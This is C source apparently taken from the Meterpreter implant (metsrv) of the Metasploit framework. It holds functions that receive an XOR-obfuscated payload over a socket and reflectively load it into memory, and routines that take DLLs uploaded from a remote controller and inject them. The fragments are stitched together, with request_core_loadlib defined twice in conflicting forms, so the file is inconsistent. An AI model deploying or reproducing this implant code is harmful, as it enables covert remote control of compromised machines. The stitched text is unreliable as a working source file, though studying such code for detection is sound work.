/*!
* @brief Load any stageless extensions that might be present in the current payload.
* @param remote Pointer to the remote instance.
* @param fd The socket descriptor passed to metsrv during intialisation.
*/
VOID load_stageless_extensions(Remote* remote, MetsrvExtension* stagelessExtensions)
{
while (stagelessExtensions->size > 0)
{
dprintf("[SERVER] Extension located at 0x%p: %u bytes", stagelessExtensions->dll, stagelessExtensions->size);
HMODULE hLibrary = LoadLibraryR(stagelessExtensions->dll, stagelessExtensions->size);
load_extension(hLibrary, TRUE, remote, NULL, extensionCommands);
stagelessExtensions = (MetsrvExtension*)((LPBYTE)stagelessExtensions->dll + stagelessExtensions->size);
}
dprintf("[SERVER] All stageless extensions loaded");
// once we have reached the end, we may have extension initializers
LPBYTE initData = (LPBYTE)(&stagelessExtensions->size) + sizeof(stagelessExtensions->size);
while (initData != NULL && *initData != '\0')
{
const char* extensionName = (const char*)initData;
LPBYTE data = initData + strlen(extensionName) + 1 + sizeof(DWORD);
DWORD dataSize = *(DWORD*)(data - sizeof(DWORD));
dprintf("[STAGELESS] init data at %p, name %s, size is %d", extensionName, extensionName, dataSize);
stagelessinit_extension(extensionName, data, dataSize);
initData = data + dataSize;
}
dprintf("[SERVER] All stageless extensions initialised");
}
DWORD WINAPI handleclient(LPVOID clientsocket){
int response = 0;
int total = 0;
char *payload;
char recvbuf[1024];
DWORD payloadlength = 0;
HMODULE loadedfile = NULL;
if(initwsa() != 0){
exit(0);
}
response = recv((int)clientsocket, (char *)&payloadlength, sizeof(DWORD), 0);
payload = (char *)malloc(payloadlength);
memset(payload,0,payloadlength);
memset(recvbuf,0,1024);
do{
response = recv((int)clientsocket, recvbuf, 1024, 0);
if(USEXOR){
xor(&recvbuf[0],response);
}
memcpy(payload,recvbuf,response);
payload += response;
total += response;
payloadlength -= response;
}while(payloadlength > 0);
payload -= total;
loadedfile = LoadLibraryR(payload,total);
meterpreterstart = (MyInit) GetProcAddressR(loadedfile,"Init");
meterpreterstart((int)clientsocket);
free(payload);
}
/*
* core_loadlib
* ------------
*
* Load a library into the address space of the executing process.
*
* TLVs:
*
* req: TLV_TYPE_LIBRARY_PATH -- The path of the library to load.
* req: TLV_TYPE_FLAGS -- Library loading flags.
* opt: TLV_TYPE_TARGET_PATH -- The contents of the library if uploading.
* opt: TLV_TYPE_DATA -- The contents of the library if uploading.
*
* TODO:
*
* - Implement in-memory library loading
*/
DWORD request_core_loadlib(Remote *pRemote, Packet *pPacket)
{
Packet *response = packet_create_response(pPacket);
DWORD res = ERROR_SUCCESS;
HMODULE library;
PCHAR libraryPath;
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
Command *first = extensionCommands;
do
{
libraryPath = packet_get_tlv_value_string(pPacket, TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(pPacket, TLV_TYPE_FLAGS);
// Invalid library path?
if (!libraryPath)
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the lib does not exist locally, but is being uploaded...
if (!(flags & LOAD_LIBRARY_FLAG_LOCAL))
{
PCHAR targetPath;
Tlv dataTlv;
// Get the library's file contents
if ((packet_get_tlv(pPacket, TLV_TYPE_DATA,
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(pPacket,
TLV_TYPE_TARGET_PATH))))
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the library is not to be stored on disk,
if (!(flags & LOAD_LIBRARY_FLAG_ON_DISK))
{
// try to load the library via its reflective loader...
library = LoadLibraryR(dataTlv.buffer, dataTlv.header.length);
if (library == NULL)
{
// if that fails, presumably besause the library doesn't support
// reflective injection, we default to using libloader...
library = libloader_load_library(targetPath,
dataTlv.buffer, dataTlv.header.length);
}
else
{
bLibLoadedReflectivly = TRUE;
}
res = (library) ? ERROR_SUCCESS : ERROR_NOT_FOUND;
}
else
{
// Otherwise, save the library buffer to disk
res = buffer_to_file(targetPath, dataTlv.buffer,
dataTlv.header.length);
}
// Override the library path
libraryPath = targetPath;
}
// If a previous operation failed, break out.
if (res != ERROR_SUCCESS)
{
break;
}
// Load the library
if (!library && !(library = LoadLibraryA(libraryPath)))
{
res = GetLastError();
}
// If this library is supposed to be an extension library, try to
// call its Init routine
if ((flags & LOAD_LIBRARY_FLAG_EXTENSION) && library)
{
res = load_extension(library, bLibLoadedReflectivly, pRemote, response, first);
}
} while (0);
if (response)
{
packet_transmit_response(res, pRemote, response);
}
return res;
}
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD res = ERROR_SUCCESS;
HMODULE library;
PCHAR libraryPath;
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
Command *first = extensionCommands;
Command *command;
do
{
libraryPath = packet_get_tlv_value_string(packet, TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
// Invalid library path?
if (!libraryPath)
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the lib does not exist locally, but is being uploaded...
if (!(flags & LOAD_LIBRARY_FLAG_LOCAL))
{
PCHAR targetPath;
Tlv dataTlv;
// Get the library's file contents
if ((packet_get_tlv(packet, TLV_TYPE_DATA,
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH))))
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the library is not to be stored on disk,
if (!(flags & LOAD_LIBRARY_FLAG_ON_DISK))
{
// try to load the library via its reflective loader...
library = LoadLibraryR(dataTlv.buffer, dataTlv.header.length);
if (library == NULL)
{
// if that fails, presumably besause the library doesn't support
// reflective injection, we default to using libloader...
library = libloader_load_library(targetPath,
dataTlv.buffer, dataTlv.header.length);
}
else
{
bLibLoadedReflectivly = TRUE;
}
res = (library) ? ERROR_SUCCESS : ERROR_NOT_FOUND;
}
else
{
// Otherwise, save the library buffer to disk
res = buffer_to_file(targetPath, dataTlv.buffer,
dataTlv.header.length);
}
// Override the library path
libraryPath = targetPath;
}
// If a previous operation failed, break out.
if (res != ERROR_SUCCESS)
break;
// Load the library
if ((!library) && (!(library = LoadLibrary(libraryPath))))
res = GetLastError();
else
res = ERROR_SUCCESS;
// If this library is supposed to be an extension library, try to
// call its Init routine
if ((flags & LOAD_LIBRARY_FLAG_EXTENSION) && (library))
{
EXTENSION * extension = (EXTENSION *)malloc(sizeof(EXTENSION));
if (extension)
{
extension->library = library;
// if the library was loaded via its reflective loader we must use GetProcAddressR()
if (bLibLoadedReflectivly)
{
extension->init = (PSRVINIT)GetProcAddressR(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddressR(extension->library, "DeinitServerExtension");
}
else
{
extension->init = (PSRVINIT)GetProcAddress(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddress(extension->library, "DeinitServerExtension");
}
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading
// functions from the metsrv.dll library. We need to do it this way as LoadLibrary/GetProcAddress
// wont work if we have used Reflective DLL Injection as metsrv.dll will be 'invisible' to these functions.
remote->hMetSrv = hAppInstance;
// Call the init routine in the library
if (extension->init)
{
dprintf("[SERVER] Calling init()...");
res = extension->init(remote);
if (res == ERROR_SUCCESS)
{
list_push(extension_list, extension);
}
else
{
free(extension);
}
}
dprintf("[SERVER] Called init()...");
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}
}
}
} while (0);
if (response)
{
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res);
packet_transmit(remote, response, NULL);
}
return res;
}
